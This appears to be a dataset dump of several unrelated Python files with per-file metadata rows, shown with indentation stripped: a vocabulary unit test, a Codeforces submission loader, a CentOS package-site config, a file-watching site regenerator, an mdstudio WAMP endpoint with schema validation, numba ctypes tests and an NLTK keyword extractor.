"German",
"call",
"to",
"boycott",
"British",
"lamb",
".",
]
for ele in elements:
vocab.add_element(ele)
save_len = len(vocab)
for ele in elements:
vocab.add_element(ele)
self.assertEqual(save_len, len(vocab))
representation = [vocab.element2repr(ele) for ele in elements]
self.assertTrue(len(representation) > 0)
if method == "indexing":
self.assertTrue(isinstance(representation[0], int))
else:
self.assertTrue(isinstance(representation[0], list))
recovered_elements = []
for rep in representation:
if method == "indexing":
idx = rep
else:
idx = self.argmax(rep)
recovered_elements.append(vocab.id2element(idx))
self.assertListEqual(elements, recovered_elements)
# Check __len__, items.
self.assertEqual(
len(set(elements)) + int(use_unk) + int(need_pad), len(vocab)
)
saved_len = len(vocab)
# Check has_element
for ele in elements:
self.assertTrue(vocab.has_element(ele))
for ele in range(10):
self.assertFalse(vocab.has_element(ele))
# check PAD_ELEMENT
if need_pad:
if method == "indexing":
expected_pad_repr = 0
else:
expected_pad_repr = [0] * (len(vocab) - 1)
self.assertEqual(
expected_pad_repr, vocab.element2repr(SpecialTokens.PAD)
)
# Check UNK_ELEMENT
if use_unk:
if method == "indexing":
expected_unk_repr = 0 + int(need_pad)
else:
expected_unk_repr = [0] * (len(vocab) - int(need_pad))
expected_unk_repr[0] = 1
self.assertEqual(
expected_unk_repr, vocab.element2repr(SpecialTokens.UNK)
)
self.assertEqual(
expected_unk_repr, vocab.element2repr("random_element")
)
self.assertEqual(saved_len, len(vocab))
# Check state
new_vocab = pkl.loads(pkl.dumps(vocab))
self.assertEqual(vocab.method, new_vocab.method)
self.assertEqual(vocab.use_pad, new_vocab.use_pad)
self.assertEqual(vocab.use_unk, new_vocab.use_unk)
self.assertEqual(vocab._element2id, new_vocab._element2id)
self.assertEqual(vocab._id2element, new_vocab._id2element)
self.assertEqual(vocab.next_id, new_vocab.next_id)
# These cases correspond to different combinations of PAD and UNK, and
# whether we have additional specials.
@data(
(True, False, ["cls", "blah"]),
(False, False, ["cls", "blah"]),
(False, True, ["cls", "blah"]),
(False, False, ["cls", "blah"]),
(True, False, None),
(False, False, None),
(False, True, None),
(False, False, None),
)
@unpack
def test_freq_filtering(self, need_pad, use_unk, special_tokens):
base_vocab = Vocabulary(
use_pad=need_pad, use_unk=use_unk, special_tokens=special_tokens
)
for p in dataset_path_iterator(self.data_path, ".txt"):
with open(p) as f:
for line in f:
for w in line.strip().split():
base_vocab.add_element(w)
vocab_filter = FrequencyVocabFilter(
base_vocab, min_frequency=2, max_frequency=4
)
filtered = base_vocab.filter(vocab_filter)
for e, eid in base_vocab.vocab_items():
if base_vocab.is_special_token(eid):
# Check that the filtered vocab have all special elements.
self.assertTrue(filtered.has_element(e))
else:
base_count = base_vocab.get_count(e)
if 2 <= base_count <= 4:
self.assertTrue(filtered.has_element(e))
self.assertEqual(base_count, filtered.get_count(e))
else:
self.assertFalse(filtered.has_element(e))
self.assertEqual(
len(base_vocab._element2id), len(base_vocab._id2element)
)
@data(
("indexing", 0, 2),
("one-hot", [1, 0, 0, 0, 0], [0, 0, 1, 0, 0]),
)
@unpack
def test_custom_vocab(self, method, expected_pad_value, expected_unk_value):
vocab = Vocabulary(method=method, use_pad=False, use_unk=False)
predefined = {
"[PAD]": -1,
"[CLS]": -1,
"[UNK]": -1,
"a": 2,
"b": 3,
"c": 4,
}
for e, count in predefined.items():
if count == -1:
vocab.add_special_element(e)
else:
vocab.add_element(e, count=count)
# Set the first element [PAD] to be the padding value.
vocab.mark_special_element(0, "PAD")
# Set the third element [UNK] to be the unknown value.
vocab.mark_special_element(2, "UNK")
# Check that padding values are the same as the expected representation.
self.assertEqual(vocab.get_pad_value(), expected_pad_value)
self.assertEqual(vocab.element2repr("[PAD]"), expected_pad_value)
# Check that unknown words are mapped to expected representation.
self.assertEqual(
vocab.element2repr("something else"), expected_unk_value
)
for i in [0, 1, 2]:
self.assertTrue(vocab.is_special_token(i))
with self.assertRaises(InvalidOperationException):
vocab.get_count(i)
if __name__ == "__main__":
unittest.main()
| 35.613043
| 80
| 0.561104
| 921
| 8,191
| 4.823018
| 0.263844
| 0.057407
| 0.040522
| 0.011706
| 0.171319
| 0.111436
| 0.047726
| 0.026565
| 0
| 0
| 0
| 0.013395
| 0.343792
| 8,191
| 229
| 81
| 35.768559
| 0.813023
| 0.165425
| 0
| 0.189349
| 0
| 0
| 0.034093
| 0
| 0
| 0
| 0
| 0
| 0.171598
| 1
| 0.029586
| false
| 0
| 0.053254
| 0
| 0.094675
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af54d8608e299a17c445fa8a61556df44ff6ac62
| 3,402
|
py
|
Python
|
scripts/crawler/sites/codeforces_loader.py
|
Takt29/CompetitiveProgrammingArena
|
7b7dfbd103b9abd6ea00156f3b7f6f2d59e40dea
|
[
"MIT"
] | null | null | null |
scripts/crawler/sites/codeforces_loader.py
|
Takt29/CompetitiveProgrammingArena
|
7b7dfbd103b9abd6ea00156f3b7f6f2d59e40dea
|
[
"MIT"
] | null | null | null |
scripts/crawler/sites/codeforces_loader.py
|
Takt29/CompetitiveProgrammingArena
|
7b7dfbd103b9abd6ea00156f3b7f6f2d59e40dea
|
[
"MIT"
] | null | null | null |
import sys
import json
from typing import Optional
from datetime import datetime, timezone
from .submissions_loader import Submission, SubmissionLoader, SubmissionStatus
class CodeforcesSubmissionLoader(SubmissionLoader):
def _normalize_status(self, external_status: str) -> SubmissionStatus:
patterns: list[tuple[SubmissionStatus, str]] = [
(SubmissionStatus.CompileError, 'COMPILATION_ERROR'),
(SubmissionStatus.WrongAnswer, 'WRONG_ANSWER'),
(SubmissionStatus.WrongAnswer, 'CHALLENGED'),
(SubmissionStatus.TimeLimitExceeded, 'TIME_LIMIT_EXCEEDED'),
(SubmissionStatus.MemoryLimitExceeded, 'MEMORY_LIMIT_EXCEEDED'),
(SubmissionStatus.Accepted, 'OK'),
(SubmissionStatus.RuntimeError, 'RUNTIME_ERROR'),
(SubmissionStatus.PresentationError, 'PRESENTATION_ERROR'),
(SubmissionStatus.WaitingForJudging, 'TESTING'),
(SubmissionStatus.TimeLimitExceeded, 'IDLENESS_LIMIT_EXCEEDED'),
(SubmissionStatus.WrongAnswer, 'PARTIAL'),
(SubmissionStatus.InternalError, 'CRASHED'),
]
for pattern in patterns:
if pattern[1] == external_status:
return pattern[0]
print('Unknown Status(Codeforces):', external_status, file=sys.stderr)
return SubmissionStatus.Unknown
def _get(self, since: Optional[datetime] = None) -> list[Submission]:
url = 'http://codeforces.com/api/problemset.recentStatus'
result: list[Submission] = []
submissions_json = self._request(f'{url}?count=1000')
submissions = json.loads(submissions_json)['result']
        # oldest first
for submission in reversed(submissions):
user_id = submission['author']['members'][0]['handle']
contest_id = str(submission['problem']['contestId'])
task_id = submission['problem']['index']
submission_id = int(submission['id'])
timestamp = int(submission['creationTimeSeconds'])
status = submission['verdict'] if 'verdict' in submission else ''
score = 1 if self._normalize_status(
status) == SubmissionStatus.Accepted else 0
language = submission['programmingLanguage']
memory = submission['memoryConsumedBytes']
exec_time = submission['timeConsumedMillis']
code_size = 0
data = Submission(
id=submission_id,
external_user_id=user_id,
external_contest_id=f'codeforces:{contest_id}',
score=score,
status=self._normalize_status(status),
language=language,
external_task_id=f'codeforces:{contest_id}:{task_id}',
external_submission_id=f'codeforces:{contest_id}:{submission_id}',
submitted_at=datetime.fromtimestamp(
timestamp, tz=timezone.utc),
memory=memory,
exec_time=exec_time,
code_size=code_size
)
if data.status == SubmissionStatus.WaitingForJudging:
break
if self.latest_id and data.id <= self.latest_id:
continue
if since is not None and data.submitted_at < since:
continue
result.append(data)
return result
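The verdict table above is scanned linearly; the same mapping reads naturally as a dict lookup. A sketch reusing SubmissionStatus from the imports above:
# Sketch: dict-based verdict lookup, equivalent to the pattern list in _normalize_status.
VERDICT_MAP = {
    'COMPILATION_ERROR': SubmissionStatus.CompileError,
    'WRONG_ANSWER': SubmissionStatus.WrongAnswer,
    'CHALLENGED': SubmissionStatus.WrongAnswer,
    'TIME_LIMIT_EXCEEDED': SubmissionStatus.TimeLimitExceeded,
    'MEMORY_LIMIT_EXCEEDED': SubmissionStatus.MemoryLimitExceeded,
    'OK': SubmissionStatus.Accepted,
    'RUNTIME_ERROR': SubmissionStatus.RuntimeError,
    'PRESENTATION_ERROR': SubmissionStatus.PresentationError,
    'TESTING': SubmissionStatus.WaitingForJudging,
    'IDLENESS_LIMIT_EXCEEDED': SubmissionStatus.TimeLimitExceeded,
    'PARTIAL': SubmissionStatus.WrongAnswer,
    'CRASHED': SubmissionStatus.InternalError,
}

def normalize_status(external_status: str) -> SubmissionStatus:
    # Unknown verdicts fall back to Unknown, as in the method above.
    return VERDICT_MAP.get(external_status, SubmissionStatus.Unknown)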
| 40.023529
| 82
| 0.620223
| 299
| 3,402
| 6.879599
| 0.381271
| 0.035002
| 0.042295
| 0.029169
| 0.032086
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004097
| 0.282481
| 3,402
| 84
| 83
| 40.5
| 0.838591
| 0.000882
| 0
| 0.029851
| 0
| 0
| 0.143362
| 0.040918
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029851
| false
| 0
| 0.074627
| 0
| 0.164179
| 0.014925
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af55a7c4bf87a19d17230ce48e8785f847954198
| 891
|
py
|
Python
|
config.py
|
johannes-gehrs/centos_packages
|
31afe052011594e37175447eae8e7a192bdc9669
|
[
"MIT"
] | 9
|
2016-04-17T02:09:47.000Z
|
2022-02-16T15:50:43.000Z
|
config.py
|
johannes-gehrs/centos_packages
|
31afe052011594e37175447eae8e7a192bdc9669
|
[
"MIT"
] | null | null | null |
config.py
|
johannes-gehrs/centos_packages
|
31afe052011594e37175447eae8e7a192bdc9669
|
[
"MIT"
] | 6
|
2016-09-10T17:42:29.000Z
|
2021-11-28T09:06:36.000Z
|
from __future__ import absolute_import, division, unicode_literals
import os
import logging
OS_VERSIONS = ['6', '7']
DATA_DIR = '/tmp/centos_packages/'
REPO_BASE_URL = 'http://mirror.centos.org/centos/'
REPOSITORIES = ['os', 'updates', 'centosplus', 'extras', 'fasttrack']
REPOSITORIES_PRETTY = {'os': 'Base',
'updates': 'Updates',
'extras': 'Extras',
'fasttrack': 'Fasttrack'}
LIMIT_RESULTS = 250
CACHE_MAX_AGE = 4260
CACHE_IN_DEBUG_MODE = False
def active_repos():
return [repo for repo in REPOSITORIES if not repo == 'centosplus']
# Logging
LOGDIR = DATA_DIR + 'log/'
LOGFILE = LOGDIR + 'centos_packages.log'
if not os.path.isdir(LOGDIR):
os.makedirs(LOGDIR)
logging.basicConfig(filename=LOGFILE,
level=logging.INFO,
format='%(asctime)s %(levelname)s: %(message)s')
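A hypothetical consumer of these constants; the mirror directory layout ({version}/{repo}/{arch}/) is an assumption, not taken from this file:
def repo_url(version, repo, arch='x86_64'):
    # Assumed CentOS mirror layout; adjust to the real path scheme.
    return '{}{}/{}/{}/'.format(REPO_BASE_URL, version, repo, arch)

for version in OS_VERSIONS:
    for repo in active_repos():
        print(repo_url(version, repo))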
| 29.7
| 70
| 0.637486
| 103
| 891
| 5.31068
| 0.601942
| 0.025594
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013062
| 0.226712
| 891
| 29
| 71
| 30.724138
| 0.780842
| 0.007856
| 0
| 0
| 0
| 0
| 0.238095
| 0.02381
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043478
| false
| 0
| 0.130435
| 0.043478
| 0.217391
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af5737ecd87101e9cae87c5d6f7ba311642b6a63
| 2,622
|
py
|
Python
|
bin/autogen.py
|
botleague/leaderboard-generator
|
644bed2b056d04b604a09ab4f1ad78afbc4ceee7
|
[
"MIT"
] | null | null | null |
bin/autogen.py
|
botleague/leaderboard-generator
|
644bed2b056d04b604a09ab4f1ad78afbc4ceee7
|
[
"MIT"
] | null | null | null |
bin/autogen.py
|
botleague/leaderboard-generator
|
644bed2b056d04b604a09ab4f1ad78afbc4ceee7
|
[
"MIT"
] | null | null | null |
import os
import sys
import time
import logging
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
def main():
logging.basicConfig(level=logging.INFO,
format='%(asctime)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
# Don't need Firestore for HTML dev
os.environ['SHOULD_USE_FIRESTORE'] = 'false'
from leaderboard_generator.config import config
# Catch up with unwatched changes
generate()
path = config.root_dir
event_handler = AutoGenTrigger()
observer = Observer()
observer.schedule(event_handler, path, recursive=True)
observer.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
observer.stop()
observer.join()
def in_html_dir(path):
from leaderboard_generator.config import config
in_static = path.startswith(config.static_dir)
in_templates = path.startswith(config.template_dir)
ret = in_static or in_templates
return ret
def generate():
from leaderboard_generator.generate_site import generate
generate()
class AutoGenTrigger(FileSystemEventHandler):
def __init__(self):
super(AutoGenTrigger, self).__init__()
self.last_gen_time = -1
def on_moved(self, event):
super(AutoGenTrigger, self).on_moved(event)
what = 'directory' if event.is_directory else 'file'
logging.debug("Moved %s: from %s to %s", what, event.src_path,
event.dest_path)
def on_created(self, event):
super(AutoGenTrigger, self).on_created(event)
what = 'directory' if event.is_directory else 'file'
logging.debug("Created %s: %s", what, event.src_path)
def on_deleted(self, event):
super(AutoGenTrigger, self).on_deleted(event)
what = 'directory' if event.is_directory else 'file'
logging.debug("Deleted %s: %s", what, event.src_path)
def on_modified(self, event):
super(AutoGenTrigger, self).on_modified(event)
what = 'directory' if event.is_directory else 'file'
logging.debug("Modified %s: %s", what, event.src_path)
if event.is_directory:
return
if not in_html_dir(event.src_path):
return
if any(x in event.src_path for x in ['___jb']):
return
if self.last_gen_time == -1 or time.time() - self.last_gen_time > 5:
logging.info("Modified %s: %s", what, event.src_path)
generate()
self.last_gen_time = time.time()
if __name__ == '__main__':
main()
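The five-second guard in on_modified is a debounce; a standalone sketch of the same idea (names are illustrative):
import time

def make_debounced(action, interval=5.0):
    # Run `action` at most once per `interval` seconds, like on_modified above.
    last = [-1.0]  # mutable cell so the closure can update it
    def maybe_run():
        now = time.time()
        if last[0] < 0 or now - last[0] > interval:
            action()
            last[0] = now
    return maybe_run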
| 28.5
| 76
| 0.644165
| 328
| 2,622
| 4.945122
| 0.301829
| 0.034525
| 0.051788
| 0.055487
| 0.364365
| 0.334155
| 0.19852
| 0.166461
| 0.138101
| 0.138101
| 0
| 0.002037
| 0.250953
| 2,622
| 91
| 77
| 28.813187
| 0.823829
| 0.02479
| 0
| 0.181818
| 0
| 0
| 0.083399
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.121212
| false
| 0
| 0.136364
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af57910bb3fe47ba44e22a72e31f84c5bdcbf609
| 10,239
|
py
|
Python
|
mdstudio/mdstudio/api/endpoint.py
|
NLeSC/LIEStudio
|
03c163b4a2590b4e2204621e1c941c28a9624887
|
[
"Apache-2.0"
] | 10
|
2017-09-14T07:26:15.000Z
|
2021-04-01T09:33:03.000Z
|
mdstudio/mdstudio/api/endpoint.py
|
NLeSC/LIEStudio
|
03c163b4a2590b4e2204621e1c941c28a9624887
|
[
"Apache-2.0"
] | 117
|
2017-09-13T08:09:48.000Z
|
2019-10-03T12:19:13.000Z
|
mdstudio/mdstudio/api/endpoint.py
|
NLeSC/LIEStudio
|
03c163b4a2590b4e2204621e1c941c28a9624887
|
[
"Apache-2.0"
] | 1
|
2018-09-26T09:40:51.000Z
|
2018-09-26T09:40:51.000Z
|
import json
import uuid
import six
from datetime import timedelta
from types import GeneratorType
from typing import Union, Optional, Callable
from jsonschema import ValidationError
from twisted.internet.defer import _inlineCallbacks, Deferred
from autobahn.wamp import RegisterOptions
from mdstudio.api.api_result import APIResult
from mdstudio.api.converter import convert_obj_to_json
from mdstudio.api.request_hash import request_hash
from mdstudio.api.schema import (ISchema, EndpointSchema, validate_json_schema, ClaimSchema,
MDStudioClaimSchema, InlineSchema, MDStudioSchema)
from mdstudio.deferred.chainable import chainable
from mdstudio.deferred.return_value import return_value
SchemaType = Union[str, dict, ISchema]
def validation_error(schema, instance, error, prefix, uri):
return \
'{prefix} validation on uri "{uri}" failed on "{property}": \n' \
'Subschema:\n{subschema}\ndid not match actual value:\n{subproperty}'.format(
prefix=prefix,
uri=uri,
property='.'.join(error.schema_path),
subschema=json.dumps(error.schema, indent=2),
subproperty=json.dumps(error.instance, indent=2)
)
class WampEndpoint(object):
def __init__(self, wrapped_f, uri, input_schema, output_schema, claim_schema=None, options=None, scope=None):
from mdstudio.component.impl.common import CommonSession
self.uri_suffix = uri
self.uri = None
self.options = options
self.scope = scope
self.instance = None # type: CommonSession
self.wrapped = wrapped_f
self.input_schema = self._to_schema(input_schema, EndpointSchema)
self.output_schema = self._to_schema(output_schema, EndpointSchema)
self.claim_schemas = [MDStudioClaimSchema(CommonSession)]
claim_schema = self._to_schema(claim_schema, ClaimSchema, {})
if claim_schema:
self.claim_schemas.append(claim_schema)
def set_instance(self, instance):
self.instance = instance
self.uri = u'{}.{}.endpoint.{}'.format(
self.instance.component_config.static.vendor,
self.instance.component_config.static.component,
self.uri_suffix
)
def register(self):
return self.instance.register(self, self.uri, options=self.options)
def __call__(self, request, signed_claims=None):
return self.execute(request, signed_claims)
@chainable
def execute(self, request, signed_claims):
if not signed_claims:
return_value(APIResult(error='Remote procedure was called without claims'))
from mdstudio.component.impl.common import CommonSession
request = convert_obj_to_json(request)
claims = yield super(CommonSession, self.instance).call(u'mdstudio.auth.endpoint.verify', signed_claims)
claim_errors = self.validate_claims(claims, request)
if claim_errors:
return_value(claim_errors)
request_errors = self.validate_request(request)
if request_errors:
return_value(request_errors)
result = self.call_wrapped(request, claims['claims'])
if isinstance(result, GeneratorType):
result = _inlineCallbacks(None, result, Deferred())
result = yield result
result = result if isinstance(result, APIResult) else APIResult(result)
convert_obj_to_json(result)
if 'error' in result:
return_value(result)
result_errors = self.validate_result(result.data)
if result_errors:
return_value(result_errors)
return_value(result)
def call_wrapped(self, request, claims):
return self.wrapped(self.instance, request, claims)
def validate_claims(self, claims, request):
if 'error' in claims:
res = APIResult(error=claims['error'])
elif 'expired' in claims:
res = APIResult(expired=claims['expired'])
else:
claims = claims['claims']
if claims['requestHash'] != request_hash(request):
res = APIResult(error='Request did not match the signed request')
elif claims['uri'] != self.uri:
res = APIResult(error='Claims were obtained for a different endpoint')
elif claims['action'] != 'call':
res = APIResult(error='Claims were not obtained for the action "call"')
else:
s = None
try:
for s in self.claim_schemas:
validate_json_schema(s.to_schema(), claims)
except ValidationError as e:
res = {'error': validation_error(s.to_schema(), claims, e, 'Claims', self.uri)}
self.instance.log.error('{error_message}', error_message=res['error'])
else:
if not self.instance.authorize_request(self.uri, claims):
res = APIResult(error='Unauthorized call to {}'.format(self.uri))
self.instance.log.error('{error_message}', error_message=res['error'])
else:
# Everything is OK, no errors
res = None
return res
def validate_request(self, request):
schema = self.input_schema.to_schema()
try:
validate_json_schema(schema, request)
except ValidationError as e:
return APIResult(error=validation_error(schema, request, e, 'Input', self.uri))
else:
# No validation errors
return None
def validate_result(self, result):
schema = self.output_schema.to_schema()
try:
validate_json_schema(schema, result)
except ValidationError as e:
res = APIResult(error=validation_error(schema, result, e, 'Output', self.uri))
else:
# No validation errors
res = None
return res
@staticmethod
def _to_schema(schema, schema_type, default_schema=None):
if isinstance(schema, (six.text_type, str)):
schema = schema_type(schema)
elif isinstance(schema, dict):
schema = InlineSchema(schema)
elif isinstance(schema, (schema_type, InlineSchema)):
schema = schema
elif not schema:
schema = InlineSchema({} if default_schema == {} else default_schema or {'type': 'null'})
else:
raise NotImplementedError('{} of type {} is not supported'.format(schema_type.__name__, type(schema)))
return schema
class CursorWampEndpoint(WampEndpoint):
def __init__(self, wrapped_f, uri, input_schema, output_schema, claim_schema=None, options=None, scope=None):
input_schema = InlineSchema({
'oneOf': [
{
'allOf': [
self._to_schema(input_schema, EndpointSchema),
self._to_schema('cursor-parameters/v1', MDStudioSchema)
]
},
self._to_schema('cursor-request/v1', MDStudioSchema),
]
})
output_schema = InlineSchema({
'allOf': [
self._to_schema(output_schema, EndpointSchema),
{
'properties': {
'results': self._to_schema('cursor-response/v1', MDStudioSchema)
}
}
]
})
super(CursorWampEndpoint, self).__init__(wrapped_f, uri, input_schema, output_schema, claim_schema, options, scope)
@chainable
def call_wrapped(self, request, claims):
meta = None
cid = None
if 'next' in request:
cid = request['next']
elif 'previous' in request:
cid = request['previous']
if cid:
meta = json.loads(self.instance.session.cache.extract('cursor#{}'.format(cid)))
if meta.get('uuid') != cid:
return_value(APIResult(error='You tried to get a cursor that doesn\'t exist or is expired. Please check your code.'))
if not meta:
meta = None
paging = {
'uri': self.uri
}
if 'paging' in request and 'limit' in request['paging']:
paging['limit'] = request['paging']['limit']
result, prev, nxt = yield self.wrapped(self.instance, request, claims['claims'], **{'paging': paging, 'meta': meta})
if prev:
prev_uuid = uuid.uuid4()
prev['uuid'] = prev_uuid
paging['previous'] = prev_uuid
self.instance.session.cache.put('cursor#{}'.format(prev_uuid), timedelta(minutes=10), json.dumps(prev))
if nxt:
next_uuid = uuid.uuid4()
nxt['uuid'] = next_uuid
paging['next'] = next_uuid
self.instance.session.cache.put('cursor#{}'.format(next_uuid), timedelta(minutes=10), json.dumps(nxt))
if not ('paging' in request and 'addPageInfo' in request['paging'] and request['paging']['addPageInfo']):
paging = {
'uri': paging['uri']
}
return_value({
'results': result,
'paging': paging
})
def endpoint(uri, input_schema, output_schema=None, claim_schema=None, options=None, scope=None):
# type: (str, SchemaType, Optional[SchemaType], Optional[SchemaType], Optional[RegisterOptions], Optional[str]) -> Callable
def wrap_f(f):
return WampEndpoint(f, uri, input_schema, output_schema, claim_schema, options, scope)
return wrap_f
def cursor_endpoint(uri, input_schema, output_schema, claim_schema=None, options=None, scope=None):
# type: (str, SchemaType, Optional[SchemaType], Optional[SchemaType], Optional[RegisterOptions], Optional[str]) -> Callable
def wrap_f(f):
return CursorWampEndpoint(f, uri, input_schema, output_schema, claim_schema, options, scope)
return wrap_f
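A sketch of how the decorator is meant to be applied; the class, URI, and inline schemas are placeholders, and a real endpoint would live on a CommonSession subclass:
class MyComponent(object):  # stand-in for a CommonSession subclass
    @endpoint('status', {'type': 'object'}, {'type': 'object'})
    def handle(self, request, claims):
        # The wrapped method receives the validated request and verified claims.
        return {'echo': request}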
| 38.205224
| 133
| 0.614611
| 1,109
| 10,239
| 5.51037
| 0.171326
| 0.029455
| 0.02651
| 0.02291
| 0.330551
| 0.281623
| 0.220749
| 0.190967
| 0.163476
| 0.16233
| 0
| 0.001501
| 0.284305
| 10,239
| 267
| 134
| 38.348315
| 0.832424
| 0.032523
| 0
| 0.239437
| 0
| 0
| 0.085968
| 0.00788
| 0
| 0
| 0
| 0
| 0
| 1
| 0.079812
| false
| 0
| 0.079812
| 0.028169
| 0.230047
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af5b9601c04d7552ac03872881009c7fc625c108
| 1,832
|
py
|
Python
|
numba/tests/test_ctypes.py
|
meawoppl/numba
|
bb8df0aee99133c6d52465ae9f9df2a7996339f3
|
[
"BSD-2-Clause"
] | 1
|
2015-01-29T06:52:36.000Z
|
2015-01-29T06:52:36.000Z
|
numba/tests/test_ctypes.py
|
meawoppl/numba
|
bb8df0aee99133c6d52465ae9f9df2a7996339f3
|
[
"BSD-2-Clause"
] | null | null | null |
numba/tests/test_ctypes.py
|
meawoppl/numba
|
bb8df0aee99133c6d52465ae9f9df2a7996339f3
|
[
"BSD-2-Clause"
] | null | null | null |
from __future__ import print_function, absolute_import, division
from ctypes import *
import sys
from numba import unittest_support as unittest
from numba.compiler import compile_isolated
from numba import types
is_windows = sys.platform.startswith('win32')
if not is_windows:
proc = CDLL(None)
c_sin = proc.sin
c_sin.argtypes = [c_double]
c_sin.restype = c_double
def use_c_sin(x):
return c_sin(x)
ctype_wrapping = CFUNCTYPE(c_double, c_double)(use_c_sin)
def use_ctype_wrapping(x):
return ctype_wrapping(x)
savethread = pythonapi.PyEval_SaveThread
savethread.argtypes = []
savethread.restype = c_void_p
restorethread = pythonapi.PyEval_RestoreThread
restorethread.argtypes = [c_void_p]
restorethread.restype = None
def use_c_pointer(x):
"""
Running in Python will cause a segfault.
"""
threadstate = savethread()
x += 1
restorethread(threadstate)
return x
@unittest.skipIf(is_windows, "Test not supported on windows")
class TestCTypes(unittest.TestCase):
def test_c_sin(self):
pyfunc = use_c_sin
cres = compile_isolated(pyfunc, [types.double])
cfunc = cres.entry_point
x = 3.14
self.assertEqual(pyfunc(x), cfunc(x))
def test_ctype_wrapping(self):
pyfunc = use_ctype_wrapping
cres = compile_isolated(pyfunc, [types.double])
cfunc = cres.entry_point
x = 3.14
self.assertEqual(pyfunc(x), cfunc(x))
def test_ctype_voidptr(self):
pyfunc = use_c_pointer
# pyfunc will segfault if called
cres = compile_isolated(pyfunc, [types.int32])
cfunc = cres.entry_point
x = 123
self.assertEqual(cfunc(x), x + 1)
if __name__ == '__main__':
unittest.main()
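The same ctypes wrapping pattern works for any libm symbol; an illustrative (POSIX-only, like the tests above) variant:
from ctypes import CDLL, c_double
libm = CDLL(None)  # the running process, as in the module above
c_cos = libm.cos
c_cos.argtypes = [c_double]
c_cos.restype = c_double

def use_c_cos(x):
    return c_cos(x)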
| 24.105263
| 64
| 0.662664
| 234
| 1,832
| 4.92735
| 0.333333
| 0.027754
| 0.018213
| 0.065048
| 0.215091
| 0.171726
| 0.171726
| 0.171726
| 0.171726
| 0.171726
| 0
| 0.010925
| 0.250546
| 1,832
| 75
| 65
| 24.426667
| 0.828842
| 0.039301
| 0
| 0.18
| 0
| 0
| 0.024207
| 0
| 0
| 0
| 0
| 0
| 0.06
| 1
| 0.12
| false
| 0
| 0.12
| 0.04
| 0.32
| 0.02
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af5fa4a7f4a8959df414d7dee58cac1a11ceef7d
| 875
|
py
|
Python
|
Preprocessing/PreprocessingX: Chunking.py
|
Om4AI/Semantic-Adherence-Checker-with-NLP
|
7104f0fbe45ef79eb6ea0db9eec4dc7b4ff150fb
|
[
"MIT"
] | 1
|
2021-05-22T02:46:00.000Z
|
2021-05-22T02:46:00.000Z
|
Preprocessing/PreprocessingX: Chunking.py
|
Om4AI/Semantic-Adherence-Checker-with-NLP
|
7104f0fbe45ef79eb6ea0db9eec4dc7b4ff150fb
|
[
"MIT"
] | null | null | null |
Preprocessing/PreprocessingX: Chunking.py
|
Om4AI/Semantic-Adherence-Checker-with-NLP
|
7104f0fbe45ef79eb6ea0db9eec4dc7b4ff150fb
|
[
"MIT"
] | null | null | null |
import nltk
from nltk.tokenize import PunktSentenceTokenizer

def chunk_process(corpus):
all_processed = []
for i in corpus:
train_text = i
train_text = train_text.lower()
custom_tokenizer = PunktSentenceTokenizer(train_text)
tokenized = custom_tokenizer.tokenize(train_text)
pro = chunk_process_content(tokenized)
all_processed.append(pro)
return all_processed
def chunk_process_content(tokenized):
processed = []
for i in tokenized:
words = nltk.word_tokenize(i)
# Tag the words by part of speech (POS): nouns, adjectives, etc.
tagged = nltk.pos_tag(words)
# print(tagged)
# Extract the required words from the corpus
pos = ["NN","NNS","NNP","JJR","JJS","NNPS","JJ"]
for (a,b) in tagged:
if b in pos:
processed.append(a)
# print(processed)
# Deduplicate while preserving order (a plain set() would not keep it).
t = []
for i in processed:
if i not in t: t.append(i)
# print(t)
processed = t
return processed
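A usage sketch; it assumes the NLTK 'punkt' and tagger models are installed:
# nltk.download('punkt'); nltk.download('averaged_perceptron_tagger')
corpus = ["The quick brown fox jumps over the lazy dog."]
print(chunk_process(corpus))
# One list of unique nouns/adjectives per document, e.g. ['quick', 'brown', 'fox', 'lazy', 'dog']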
| 23.648649
| 57
| 0.666286
| 122
| 875
| 4.639344
| 0.418033
| 0.079505
| 0.031802
| 0.053004
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.221714
| 875
| 36
| 58
| 24.305556
| 0.831131
